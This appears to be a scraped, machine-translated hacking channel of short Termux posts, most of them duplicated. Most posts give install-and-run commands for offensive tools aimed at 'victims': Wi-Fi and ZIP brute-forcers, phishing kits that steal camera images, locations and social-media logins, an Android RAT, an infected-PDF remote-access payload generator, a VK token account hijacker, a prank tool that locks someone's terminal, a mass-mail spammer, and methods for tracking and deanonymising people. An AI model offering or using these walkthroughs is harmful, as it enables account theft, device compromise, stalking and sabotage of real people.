Turning Termux into a browser
Friends, did you know that you can view regular websites through Termux? To do this, you need to use the w3m utility, which has a lot of functions, but today I will show you only one - how to open a site and view it.
To install the browser in termux, we will use the below command. This command will install the w3m package in your termux.
▪️pkg install w3m
Now that everything is installed and we just need to provide the URL of the site that you want to visit using the browser.
▪️w3m https://google.com/
Now you can see the site in the thermux and can navigate as you usually do in Chrome using the arrows in the lower left corner of the screen.
🔑
Friends, did you know that you can view regular websites through Termux? To do this, you need to use the w3m utility, which has a lot of functions, but today I will show you only one - how to open a site and view it.
To install the browser in termux, we will use the below command. This command will install the w3m package in your termux.
▪️pkg install w3m
Now that everything is installed and we just need to provide the URL of the site that you want to visit using the browser.
▪️w3m https://google.com/
Now you can see the site in the thermux and can navigate as you usually do in Chrome using the arrows in the lower left corner of the screen.
🔑
Breaking Wi-Fi with wi-toolkit!
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this will require an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this will require an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
GitHub
GitHub - mkdirlove/WI-TOOLKIT: Hack WiFi in Termux ( ROOTED DEVICES ONLY)
Hack WiFi in Termux ( ROOTED DEVICES ONLY). Contribute to mkdirlove/WI-TOOLKIT development by creating an account on GitHub.
Hacking an encrypted ZIP archive!
For this we will use the ZIP-Password-BruteForcer utility. It is written in Python, so it can run on both Termux and Windows.
Installation in Termux:
▪️git clone https://github.com/The404Hacking/ZIP-Password-BruteForcer
Usage:
▪️cd ZIP-Password-BruteForcer
▪️python ZIP-Password-BruteForcer.py
Next, we enter the path to the encrypted archive itself, as well as to the dictionary for searching. The process will start, and the speed of searching passwords will depend on the power of your device.
For this we will use the ZIP-Password-BruteForcer utility. It is written in Python, so it can run on both Termux and Windows.
Installation in Termux:
▪️git clone https://github.com/The404Hacking/ZIP-Password-BruteForcer
Usage:
▪️cd ZIP-Password-BruteForcer
▪️python ZIP-Password-BruteForcer.py
Next, we enter the path to the encrypted archive itself, as well as to the dictionary for searching. The process will start, and the speed of searching passwords will depend on the power of your device.
GitHub
GitHub - The404Hacking/ZIP-Password-BruteForcer: Zip File Password Cracking with Using Password List !
Zip File Password Cracking with Using Password List ! - The404Hacking/ZIP-Password-BruteForcer
Checking mail for validity in Termux
KnockMail is a utility that checks mail for validity, that is, for the fact of its existence. The tool is especially useful for those who work with databases.
Installation
$ pkg update
$ pkg upgrade
$ pkg instal tsu
$ pkg install python
$ pkg intall git
$ pkg install python2
$ git clone https://github.com/4w4k3/KnockMail.git
$ cd KnockMail
$ tsu
$ pip install -r requeriments.txt
Running
$ python knock.py
After launching, we are greeted by a menu in which we can choose to check e-mail addresses in a special file (number 1) or check one e-mail (number 2).
KnockMail is a utility that checks mail for validity, that is, for the fact of its existence. The tool is especially useful for those who work with databases.
Installation
$ pkg update
$ pkg upgrade
$ pkg instal tsu
$ pkg install python
$ pkg intall git
$ pkg install python2
$ git clone https://github.com/4w4k3/KnockMail.git
$ cd KnockMail
$ tsu
$ pip install -r requeriments.txt
Running
$ python knock.py
After launching, we are greeted by a menu in which we can choose to check e-mail addresses in a special file (number 1) or check one e-mail (number 2).
GitHub
GitHub - 4w4k3/KnockMail: Verify if email exists
Verify if email exists. Contribute to 4w4k3/KnockMail development by creating an account on GitHub.
Deanon victims using phishing link
Hello everyone.
Storm Breaker is a utility for creating phishing links, which in turn generates and "steals" a photo from the victim's camera. You can also access the location of the victim's smartphone, steal Windows 10 passwords, access the webcam and microphone.
Installation:
▪️git clone https://github.com/ultrasecurity/Storm-Breaker
▪️cd Storm-Breaker
▪️sudo bash linux-installer.sh
▪️python3 -m pip install -r requirments.txt
Usage:
▪️sudo python3 Storm-Breaker.py
All information is provided for informational purposes only. We are not responsible for your actions.
Hello everyone.
Storm Breaker is a utility for creating phishing links, which in turn generates and "steals" a photo from the victim's camera. You can also access the location of the victim's smartphone, steal Windows 10 passwords, access the webcam and microphone.
Installation:
▪️git clone https://github.com/ultrasecurity/Storm-Breaker
▪️cd Storm-Breaker
▪️sudo bash linux-installer.sh
▪️python3 -m pip install -r requirments.txt
Usage:
▪️sudo python3 Storm-Breaker.py
All information is provided for informational purposes only. We are not responsible for your actions.
GitHub
GitHub - ultrasecurity/Storm-Breaker: Social engineering tool [Access Webcam & Microphone & Location Finder] With {Py,JS,PHP}
Social engineering tool [Access Webcam & Microphone & Location Finder] With {Py,JS,PHP} - ultrasecurity/Storm-Breaker
The coolest multitool for phishing!
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
GitHub
GitHub - noob-hackers/mrphish: All In One Social Accounts Phishing With Otp Bypass In Termux.
All In One Social Accounts Phishing With Otp Bypass In Termux. - noob-hackers/mrphish
Universal tool for Instagram
Get-instagram-users-info --- Any-instagram-account - utility for raising your own farm of Instagram bots. Allows you to put likes, hashtag likes, subscribe, subscribe to certain hashtags, unsubscribe, unsubscribe from all subscribers and much more.
Installation
$ pkg update && upgrade
$ pkg install git python
$ git clone https://github.com/zxllkada/Get-instagram-users-info---Any-instagram-account.git
$ cd Get-instagram-users-info --- Any-instagram-account
$ pip install -r requirements.txt
Installation
$ cd Get-instagram-users-info --- Any-instagram-account
$ cd zxllkada
$ cd Dump_Instagram_Information_ANY_ACCOUNT
$ python3 InstaInfo_zxll.py
Get-instagram-users-info --- Any-instagram-account - utility for raising your own farm of Instagram bots. Allows you to put likes, hashtag likes, subscribe, subscribe to certain hashtags, unsubscribe, unsubscribe from all subscribers and much more.
Installation
$ pkg update && upgrade
$ pkg install git python
$ git clone https://github.com/zxllkada/Get-instagram-users-info---Any-instagram-account.git
$ cd Get-instagram-users-info --- Any-instagram-account
$ pip install -r requirements.txt
Installation
$ cd Get-instagram-users-info --- Any-instagram-account
$ cd zxllkada
$ cd Dump_Instagram_Information_ANY_ACCOUNT
$ python3 InstaInfo_zxll.py
The coolest multitool for phishing!
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
Good day! Today we are going to show you a new bash-based script that was created to phish social media accounts. This script is called Mrphish → TYK ←. The great thing about the tool is that it works on both rooted and non-rooted Android devices.
Let's go!
1. For installation we use:
apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/noob-hackers/mrphish
$ cd $ HOME
$ cd mrphish
$ bash setup
$ bash mrphish
2. After installation, all you need to do is select the required social network and send the link to the victim.
GitHub
GitHub - noob-hackers/mrphish: All In One Social Accounts Phishing With Otp Bypass In Termux.
All In One Social Accounts Phishing With Otp Bypass In Termux. - noob-hackers/mrphish
Best Android RAT in Termux!
haxRat is a cloud-based Android remote control script based on NodeJS. With it, you can block calls on the device, see all files and pictures, listen to the microphone, monitor notifications and much more.
Installation
◽ apt install nodejs git
◽git clone https://github.com/hax4us/haxRat.git
◽cd haxRat / server
◽npm install
◽mkdir ~ / haxrat
Usage
$ node index.js
haxRat is a cloud-based Android remote control script based on NodeJS. With it, you can block calls on the device, see all files and pictures, listen to the microphone, monitor notifications and much more.
Installation
◽ apt install nodejs git
◽git clone https://github.com/hax4us/haxRat.git
◽cd haxRat / server
◽npm install
◽mkdir ~ / haxrat
Usage
$ node index.js
GitHub
GitHub - Hax4us/haxRat: A Android RAT with lots of features , check README for more information.
A Android RAT with lots of features , check README for more information. - Hax4us/haxRat
Breaking Wi-Fi with wi-toolkit!
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this requires an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
Firework! In this post, we will show you a utility that will allow you to perform a brute force attack on a selected Wi-Fi network.
This utility is called WI-TOOLKIT → TYK ←. Also, the functions of this program include WPS, WPA / WPA2 attacks, but this requires an Internet connection.
Let's get started:
1. To install, use Termux and write the lines:
git clone https://github.com/mkdirlove/WI-TOOLKIT
$ cd WI-TOOLKIT
$ chmod + x *
$ ./install.sh
2. To use, we write the command:
$ sudo python wi-toolkit.py
GitHub
GitHub - mkdirlove/WI-TOOLKIT: Hack WiFi in Termux ( ROOTED DEVICES ONLY)
Hack WiFi in Termux ( ROOTED DEVICES ONLY). Contribute to mkdirlove/WI-TOOLKIT development by creating an account on GitHub.
Block Termux victim
Fireworks, bandits! If you are very tired of some schoolboy, then you can throw him a "super-megahacker tool", the student will install it and his terminal will be blocked.
Installation
$ git clone https://github.com/fuckwbored/termuxman
$ cd termuxman
Running
$ python3 termuxman.py
Block, have fun ✌️
Fireworks, bandits! If you are very tired of some schoolboy, then you can throw him a "super-megahacker tool", the student will install it and his terminal will be blocked.
Installation
$ git clone https://github.com/fuckwbored/termuxman
$ cd termuxman
Running
$ python3 termuxman.py
Block, have fun ✌️
HACKING PC THROUGH PDF FILE
The PDF format has many vulnerabilities, thanks to which viruses and the like can be embedded into files. This post introduces the automated Insanity Framework for creating an infected PDF file that will allow remote access to machines on Windows.
First, download Termux
Installation:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod + x insanity.py
$ ./install.sh
Usage:
$ sudo python2 insanity.py
On the first launch, all necessary dependencies will be installed and the main menu will open. In it, we select the first item to create the payload. Next, select Fake Acrobat PDF. Enter the ip address and port.
The PDF format has many vulnerabilities, thanks to which viruses and the like can be embedded into files. This post introduces the automated Insanity Framework for creating an infected PDF file that will allow remote access to machines on Windows.
First, download Termux
Installation:
$ git clone https://github.com/4w4k3/Insanity-Framework
$ cd Insanity-Framework
$ chmod + x insanity.py
$ ./install.sh
Usage:
$ sudo python2 insanity.py
On the first launch, all necessary dependencies will be installed and the main menu will open. In it, we select the first item to create the payload. Next, select Fake Acrobat PDF. Enter the ip address and port.
GitHub
GitHub - 4w4k3/Insanity-Framework: Generate Payloads and Control Remote Machines. [Discontinued]
Generate Payloads and Control Remote Machines. [Discontinued] - 4w4k3/Insanity-Framework
🔍Find a person's location by IP!
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
GitHub
GitHub - noob-hackers/ipdrone: Track Location With Live Address And Accuracy In Termux
Track Location With Live Address And Accuracy In Termux - noob-hackers/ipdrone
VK hacking script
Vk-Tokenner is a script that will allow access to the victim's account through a token.
Installation
▪️apt update
▪️apt upgrade
▪️pkg install git
▪️pkg install python
▪️pkg install python2
▪️pip install vk
▪️pip install vk_api
▪️git clone https://github.com/XuliGan4eg2006/Vk-Tokenner-.git
▪️cd Vk-Tokenner
▪️pip3 install -r requirements.txt
Running
▪️python3 main.py
▪️python2 main.py
All information is provided for informational purposes only. We are not responsible for your actions.
Vk-Tokenner is a script that will allow access to the victim's account through a token.
Installation
▪️apt update
▪️apt upgrade
▪️pkg install git
▪️pkg install python
▪️pkg install python2
▪️pip install vk
▪️pip install vk_api
▪️git clone https://github.com/XuliGan4eg2006/Vk-Tokenner-.git
▪️cd Vk-Tokenner
▪️pip3 install -r requirements.txt
Running
▪️python3 main.py
▪️python2 main.py
All information is provided for informational purposes only. We are not responsible for your actions.
EmailSpamer.zip
4.1 MB
Spam in the mail
This utility is designed for mass mailing of emails to Email addresses.
This utility is designed for mass mailing of emails to Email addresses.
⚙️ S.E.Tools. Trape V2.
🖖🏻 Greetings user_name.
• Trape is a great tool for social engineer and #OSINT professionals that was introduced to the world at BlackHat Singapore in 2018 and was recently updated to version 2.0.
• For those who hear about this tool for the first time, the tool can create a # phishing link that allows us to track our target. With the help of Trape, we can get the IP address, geolocation and other necessary information about our goal. You can also remotely run js scripts and upload files to your PC, capture credentials.
• Description and installation information is available on Github: https://github.com/jofpin/trape
• Using the tool: https://eforensicsmag.com/trape-stable-v2-0-by-jose-pino/
# Note #Tools # SI. Your S.E.
🖖🏻 Greetings user_name.
• Trape is a great tool for social engineer and #OSINT professionals that was introduced to the world at BlackHat Singapore in 2018 and was recently updated to version 2.0.
• For those who hear about this tool for the first time, the tool can create a # phishing link that allows us to track our target. With the help of Trape, we can get the IP address, geolocation and other necessary information about our goal. You can also remotely run js scripts and upload files to your PC, capture credentials.
• Description and installation information is available on Github: https://github.com/jofpin/trape
• Using the tool: https://eforensicsmag.com/trape-stable-v2-0-by-jose-pino/
# Note #Tools # SI. Your S.E.
GitHub
GitHub - jofpin/trape: People tracker on the Internet: OSINT analysis and research tool by Jose Pino
People tracker on the Internet: OSINT analysis and research tool by Jose Pino - jofpin/trape
Testing a free Linux simulator!
If you decide to install Linux on your PC, then before you do so, you can try using it online.
The onworks.net website makes it possible to launch one of the popular Linux distributions directly from the browser: Ubuntu 19, Windows 10 Emulator, Parrot Security OS, Elementary OS, Debian, etc.
The functionality is a little limited from the usual OS, but the interface is the same. Distributions are hosted on free hosting.
If you decide to install Linux on your PC, then before you do so, you can try using it online.
The onworks.net website makes it possible to launch one of the popular Linux distributions directly from the browser: Ubuntu 19, Windows 10 Emulator, Parrot Security OS, Elementary OS, Debian, etc.
The functionality is a little limited from the usual OS, but the interface is the same. Distributions are hosted on free hosting.
https://github.com/evpo/EncryptPad
We encrypt the file in a couple of clicks!
EncryptPad is a text editor with which you can manage encrypted text and files, including images, video and audio.
To use, you must:
▷ Install EncryptPad.
▷ Select or create a text file in the application window.
▷ Click on the gear icon and select encryption options.
▷ Write any text to a file and click on "Encryption".
▷ Then click "Set Password", enter the password and save the file.
We encrypt the file in a couple of clicks!
EncryptPad is a text editor with which you can manage encrypted text and files, including images, video and audio.
To use, you must:
▷ Install EncryptPad.
▷ Select or create a text file in the application window.
▷ Click on the gear icon and select encryption options.
▷ Write any text to a file and click on "Encryption".
▷ Then click "Set Password", enter the password and save the file.
GitHub
GitHub - evpo/EncryptPad: Minimalist secure text editor and binary encryptor that implements RFC 4880 Open PGP format: symmetrically…
Minimalist secure text editor and binary encryptor that implements RFC 4880 Open PGP format: symmetrically encrypted, compressed and integrity protected. The editor can protect files with passwords...
🔍Find a person's location by IP!
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
IPdrone is an information gathering tool that allows you to find out someone's location just by knowing their white IP address. This tool is an IP lookup tool that will allow you to get most of the information about a specific IP address using Termux.
Installation:
$ pkg install git python python2 -y
$ pip install lolcat requests
$ git clone https://github.com/noob-hackers/ipdrone
$ cd ipdrone
Usage:
$ python ipdrone.py -v IP address
If you restart termux then you need to change your directory to IPdrone folder first. Instead of an IP address, you simply need to enter the IP address of the person you are trying to collect information about.
GitHub
GitHub - noob-hackers/ipdrone: Track Location With Live Address And Accuracy In Termux
Track Location With Live Address And Accuracy In Termux - noob-hackers/ipdrone
Find out the hidden information about the user VK
Friends, I welcome everyone! In today's post, you will learn how you can find hidden information about any VK user.
Instructions:
1. Open the link https://vk.com/foaf.php?id= in the browser and after id = write the numbers from the victim's id;
└ You can find out the id by nickname here, for example https://vk.com/foaf.php?id=460060000;
2. Next, look at the source code of the page;
└ Firefox -> Right Click + Page Source
3. We study the source code - there you can find a whole klondike of useful information:
ya: created - the date the profile was created;
ya: modified - date of change of name in profile (for example, in case of divorce / marriage);
foaf: externalProfile - link to profiles in other social networks (including those that were indicated earlier, but are now hidden);
ya: bio - information "about yourself" that is not displayed on the page (often found in profiles registered 10 or more years ago);
ya: lastLoggedIn - date of the last entry, accurate to the second.
Friends, I welcome everyone! In today's post, you will learn how you can find hidden information about any VK user.
Instructions:
1. Open the link https://vk.com/foaf.php?id= in the browser and after id = write the numbers from the victim's id;
└ You can find out the id by nickname here, for example https://vk.com/foaf.php?id=460060000;
2. Next, look at the source code of the page;
└ Firefox -> Right Click + Page Source
3. We study the source code - there you can find a whole klondike of useful information:
ya: created - the date the profile was created;
ya: modified - date of change of name in profile (for example, in case of divorce / marriage);
foaf: externalProfile - link to profiles in other social networks (including those that were indicated earlier, but are now hidden);
ya: bio - information "about yourself" that is not displayed on the page (often found in profiles registered 10 or more years ago);
ya: lastLoggedIn - date of the last entry, accurate to the second.
❤1